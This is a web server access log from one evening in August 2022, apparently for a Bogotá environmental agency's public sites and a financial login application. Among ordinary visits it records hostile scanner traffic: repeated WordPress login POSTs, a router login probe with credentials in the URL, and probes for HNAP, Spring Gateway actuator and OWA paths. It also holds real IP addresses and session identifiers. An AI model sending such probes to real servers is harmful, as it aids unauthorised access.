195.3.222.18 - - [11/Aug/2022:21:00:49 -0500] "GET / HTTP/1.1" 200 319
195.3.222.18 - - [11/Aug/2022:21:00:49 -0500] "POST /HNAP1/ HTTP/1.1" 404 1018
216.245.221.92 - - [11/Aug/2022:21:02:30 -0500] "HEAD / HTTP/1.1" 200 -
173.252.79.12 - - [11/Aug/2022:21:03:43 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
201.245.192.253 - - [11/Aug/2022:21:04:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
173.252.107.22 - - [11/Aug/2022:21:04:16 -0500] "GET /images/llantas-teusaquillo-1-abril.jpg HTTP/1.1" 200 50674
69.171.251.10 - - [11/Aug/2022:21:04:16 -0500] "GET /images/llantas-teusaquillo-1-abril.jpg HTTP/1.1" 200 50674
172.22.2.4 - - [11/Aug/2022:21:03:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:21:03:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53631
216.245.221.92 - - [11/Aug/2022:21:07:30 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.109 - - [11/Aug/2022:21:07:44 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [11/Aug/2022:21:07:45 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
201.245.192.253 - - [11/Aug/2022:21:09:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
5.255.231.244 - - [11/Aug/2022:21:10:31 -0500] "-" 408 -
172.22.2.4 - - [11/Aug/2022:21:08:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.23 - - [11/Aug/2022:21:10:40 -0500] "-" 408 -
172.22.2.4 - - [11/Aug/2022:21:09:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [11/Aug/2022:21:12:30 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.105 - - [11/Aug/2022:21:13:58 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [11/Aug/2022:21:13:59 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [11/Aug/2022:21:14:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
207.46.13.188 - - [11/Aug/2022:21:16:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2304.pdf HTTP/1.1" 200 4328597
172.22.2.4 - - [11/Aug/2022:21:14:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
31.13.127.2 - - [11/Aug/2022:21:16:28 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
207.46.13.188 - - [11/Aug/2022:21:16:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2304.pdf HTTP/1.1" 200 4328597
172.22.2.4 - - [11/Aug/2022:21:15:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60865
216.245.221.92 - - [11/Aug/2022:21:17:30 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.105 - - [11/Aug/2022:21:18:19 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [11/Aug/2022:21:18:20 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [11/Aug/2022:21:19:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
5.255.253.106 - - [11/Aug/2022:21:20:31 -0500] "-" 408 -
201.245.192.253 - - [11/Aug/2022:21:20:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47190
201.245.192.253 - - [11/Aug/2022:21:20:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48591
186.28.105.70 - - [11/Aug/2022:21:20:48 -0500] "GET /Publicaciones/SSFFS-11540.zip HTTP/1.1" 200 1987207
62.231.95.189 - - [11/Aug/2022:21:21:26 -0500] "GET /portaldeninos/ HTTP/1.0" 200 110281
62.231.95.189 - - [11/Aug/2022:21:21:29 -0500] "GET / HTTP/1.0" 200 319
172.22.2.4 - - [11/Aug/2022:21:20:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.7.214.117 - - [11/Aug/2022:21:22:27 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [11/Aug/2022:21:22:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:21:21:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59310
201.245.192.253 - - [11/Aug/2022:21:24:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
186.30.74.112 - - [11/Aug/2022:21:25:32 -0500] "GET /BLA/resoluciones/index.php?dir= HTTP/1.1" 200 13093
186.30.74.112 - - [11/Aug/2022:21:25:37 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2020%2F HTTP/1.1" 200 164463
172.22.2.4 - - [11/Aug/2022:21:24:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63198
39.45.86.192 - - [11/Aug/2022:21:26:29 -0500] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 1019
2.57.122.98 - - [11/Aug/2022:21:27:24 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [11/Aug/2022:21:27:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:21:28:03 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [11/Aug/2022:21:26:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:21:28:08 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [11/Aug/2022:21:28:17 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [11/Aug/2022:21:27:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60865
201.245.192.253 - - [11/Aug/2022:21:29:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
201.245.192.253 - - [11/Aug/2022:21:30:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47190
201.245.192.253 - - [11/Aug/2022:21:30:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48591
172.22.2.4 - - [11/Aug/2022:21:31:02 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
141.8.142.80 - - [11/Aug/2022:21:31:26 -0500] "-" 408 -
216.245.221.92 - - [11/Aug/2022:21:32:30 -0500] "HEAD / HTTP/1.1" 200 -
186.118.13.206 - - [11/Aug/2022:21:32:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1168.pdf HTTP/1.1" 200 560722
186.118.13.206 - - [11/Aug/2022:21:33:00 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [11/Aug/2022:21:32:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2022:21:33:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [11/Aug/2022:21:33:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58946
216.245.221.92 - - [11/Aug/2022:21:37:30 -0500] "HEAD / HTTP/1.1" 200 -
186.102.20.225 - - [11/Aug/2022:21:38:12 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX18tDEabdsXfkbvNLWsV6hkLRZc+/lgFzR1DFwJrkyQNiXeZWkWINRO/YPsntdoKaQqF3a63z2ZKw3C5mxp5OTi2BesbIWCIoz+Azin1FTHuhU9/BI/jP4X8E+8Cxw+45RClb5c/xBe7vQ==&u=U2FsdGVkX1+v/KoyphQsvmtBVEAWyL/qkNBMSG6ZVrM=&y=U2FsdGVkX1+JNCc9WE3flU0H97igJ/srVFSCJBX5i3fTYyPYXlkadxtVF4I5swH+ HTTP/1.1" 200 60
201.245.192.253 - - [11/Aug/2022:21:38:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [11/Aug/2022:21:38:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.14 - - [11/Aug/2022:21:40:11 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html HTTP/1.1" 304 -
172.22.2.4 - - [11/Aug/2022:21:38:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
201.245.192.253 - - [11/Aug/2022:21:40:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47190
201.245.192.253 - - [11/Aug/2022:21:40:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48587
87.250.224.157 - - [11/Aug/2022:21:41:26 -0500] "-" 408 -
191.109.183.158 - - [11/Aug/2022:21:42:26 -0500] "-" 408 -
216.245.221.92 - - [11/Aug/2022:21:42:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2022:21:43:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [11/Aug/2022:21:43:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.84 - - [11/Aug/2022:21:45:39 -0500] "GET /pdc/actos/433.pdf HTTP/1.1" 200 474796
69.171.231.1 - - [11/Aug/2022:21:45:40 -0500] "GET /caminos-de-los-cerros-espacios-naturales-seguros-para-cuidar-la-salud-fisica-y-mental-de-los-ciudadanos.html HTTP/1.1" 206 1139
185.119.81.109 - - [11/Aug/2022:21:46:23 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
172.22.2.4 - - [11/Aug/2022:21:44:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
185.119.81.109 - - [11/Aug/2022:21:46:24 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
5.255.253.139 - - [11/Aug/2022:21:47:15 -0500] "-" 408 -
213.180.203.65 - - [11/Aug/2022:21:47:21 -0500] "-" 408 -
87.250.224.28 - - [11/Aug/2022:21:47:26 -0500] "-" 408 -
216.245.221.92 - - [11/Aug/2022:21:47:30 -0500] "HEAD / HTTP/1.1" 200 -
87.250.224.117 - - [11/Aug/2022:21:47:32 -0500] "-" 408 -
5.255.253.149 - - [11/Aug/2022:21:47:47 -0500] "-" 408 -
5.255.253.164 - - [11/Aug/2022:21:48:02 -0500] "-" 408 -
5.45.207.90 - - [11/Aug/2022:21:48:32 -0500] "-" 408 -
201.245.192.253 - - [11/Aug/2022:21:48:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
69.171.249.19 - - [11/Aug/2022:21:49:14 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
5.255.253.119 - - [11/Aug/2022:21:49:32 -0500] "-" 408 -
172.22.2.4 - - [11/Aug/2022:21:49:33 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2006%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 304 -
69.171.249.1 - - [11/Aug/2022:21:50:01 -0500] "GET /experiencias-exitosas-en-la-implementacion-de-buenas-practicas-ambientales-en-entidades-del-distrito.html HTTP/1.1" 206 821
141.8.142.74 - - [11/Aug/2022:21:50:32 -0500] "-" 408 -
172.22.2.4 - - [11/Aug/2022:21:49:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:21:50:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57366
216.245.221.92 - - [11/Aug/2022:21:52:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2022:21:53:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
87.250.224.197 - - [11/Aug/2022:21:54:37 -0500] "-" 408 -
172.22.2.4 - - [11/Aug/2022:21:55:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Aug/2022:21:57:30 -0500] "HEAD / HTTP/1.1" 200 -
87.250.224.97 - - [11/Aug/2022:21:57:37 -0500] "-" 408 -
172.22.2.4 - - [11/Aug/2022:21:56:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59819
201.245.192.253 - - [11/Aug/2022:21:58:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
173.252.107.9 - - [11/Aug/2022:22:00:00 -0500] "GET /images/visita-suspension-humedal-techo-24-mayo.jpg HTTP/1.1" 200 57365
185.119.81.97 - - [11/Aug/2022:22:00:18 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [11/Aug/2022:22:00:19 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [11/Aug/2022:22:02:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:22:01:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:22:02:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [11/Aug/2022:22:02:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [11/Aug/2022:22:02:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49092
201.245.192.253 - - [11/Aug/2022:22:03:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
5.255.253.184 - - [11/Aug/2022:22:04:02 -0500] "-" 408 -
64.124.8.54 - - [11/Aug/2022:22:04:33 -0500] "GET /galeria/nivo-slider/demo/convocatorias.html HTTP/1.1" 200 3464
172.22.2.4 - - [11/Aug/2022:22:07:24 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [11/Aug/2022:22:07:25 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
186.29.86.13 - - [11/Aug/2022:22:07:29 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.29.86.13 - - [11/Aug/2022:22:07:30 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [11/Aug/2022:22:07:30 -0500] "HEAD / HTTP/1.1" 200 -
186.29.86.13 - - [11/Aug/2022:22:07:34 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 391860
172.22.2.4 - - [11/Aug/2022:22:07:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2022:22:08:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [11/Aug/2022:22:07:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44462
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12493
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=FNCcQtX75q9MsnkPRm22+GKC.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=FNCcQtX75q9MsnkPRm22+GKC.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=FNCcQtX75q9MsnkPRm22+GKC.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=FNCcQtX75q9MsnkPRm22+GKC.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=FNCcQtX75q9MsnkPRm22+GKC.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=FNCcQtX75q9MsnkPRm22+GKC.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.29.179.102 - - [11/Aug/2022:22:09:15 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:16 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12171
186.29.179.102 - - [11/Aug/2022:22:09:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.29.179.102 - - [11/Aug/2022:22:09:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.29.179.102 - - [11/Aug/2022:22:09:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:17 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:20 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11651
186.29.179.102 - - [11/Aug/2022:22:09:20 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
186.29.179.102 - - [11/Aug/2022:22:09:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:21 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
186.29.179.102 - - [11/Aug/2022:22:09:26 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 6085
186.29.179.102 - - [11/Aug/2022:22:09:27 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 18727
186.29.179.102 - - [11/Aug/2022:22:09:27 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:27 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:27 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:27 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:27 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
186.29.179.102 - - [11/Aug/2022:22:09:27 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.29.179.102 - - [11/Aug/2022:22:09:27 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
186.29.179.102 - - [11/Aug/2022:22:09:29 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
186.29.179.102 - - [11/Aug/2022:22:09:29 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 3887
186.29.179.102 - - [11/Aug/2022:22:09:30 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 43266
186.29.179.102 - - [11/Aug/2022:22:09:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12755
186.29.179.102 - - [11/Aug/2022:22:09:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 193
186.29.179.102 - - [11/Aug/2022:22:09:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 193
186.29.179.102 - - [11/Aug/2022:22:09:42 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 39541
186.29.179.102 - - [11/Aug/2022:22:09:43 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 39541
186.29.179.102 - - [11/Aug/2022:22:09:43 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:43 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:43 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:43 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:43 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:09:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 10616
172.22.2.4 - - [11/Aug/2022:22:08:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53994
186.29.179.102 - - [11/Aug/2022:22:09:47 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 17021
34.147.115.251 - - [11/Aug/2022:22:11:03 -0500] "GET / HTTP/1.1" 200 319
95.108.213.31 - - [11/Aug/2022:22:12:02 -0500] "-" 408 -
216.245.221.92 - - [11/Aug/2022:22:12:30 -0500] "HEAD / HTTP/1.1" 200 -
185.7.214.117 - - [11/Aug/2022:22:13:46 -0500] "GET /actuator/gateway/routes HTTP/1.1" 404 1018
201.245.192.253 - - [11/Aug/2022:22:13:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
92.118.39.88 - - [11/Aug/2022:22:14:03 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [11/Aug/2022:22:12:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49680
172.22.2.4 - - [11/Aug/2022:22:12:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45684
172.22.2.4 - - [11/Aug/2022:22:13:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.65 - - [11/Aug/2022:22:15:08 -0500] "GET /bla/resoluciones/resoluciones%202008/0441.pdf HTTP/1.1" 200 226742
172.22.2.4 - - [11/Aug/2022:22:13:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54347
172.22.2.4 - - [11/Aug/2022:22:15:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [11/Aug/2022:22:16:43 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [11/Aug/2022:22:16:49 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [11/Aug/2022:22:16:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [11/Aug/2022:22:17:30 -0500] "HEAD / HTTP/1.1" 200 -
173.252.111.22 - - [11/Aug/2022:22:18:38 -0500] "GET /mas-de-570-llantas-fueron-recolectadas-en-la-llantaton-de-bosa.html HTTP/1.1" 206 907
201.245.192.253 - - [11/Aug/2022:22:18:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [11/Aug/2022:22:18:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2022:22:20:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47030
201.245.192.253 - - [11/Aug/2022:22:20:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48460
172.22.2.4 - - [11/Aug/2022:22:19:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60865
172.22.2.4 - - [11/Aug/2022:22:21:47 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%202%20del%2031%20de%20Mayo%20de%202011.pdf HTTP/1.1" 304 -
95.108.213.35 - - [11/Aug/2022:22:22:02 -0500] "-" 408 -
216.245.221.92 - - [11/Aug/2022:22:22:30 -0500] "HEAD / HTTP/1.1" 200 -
186.29.179.102 - - [11/Aug/2022:22:23:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 17024
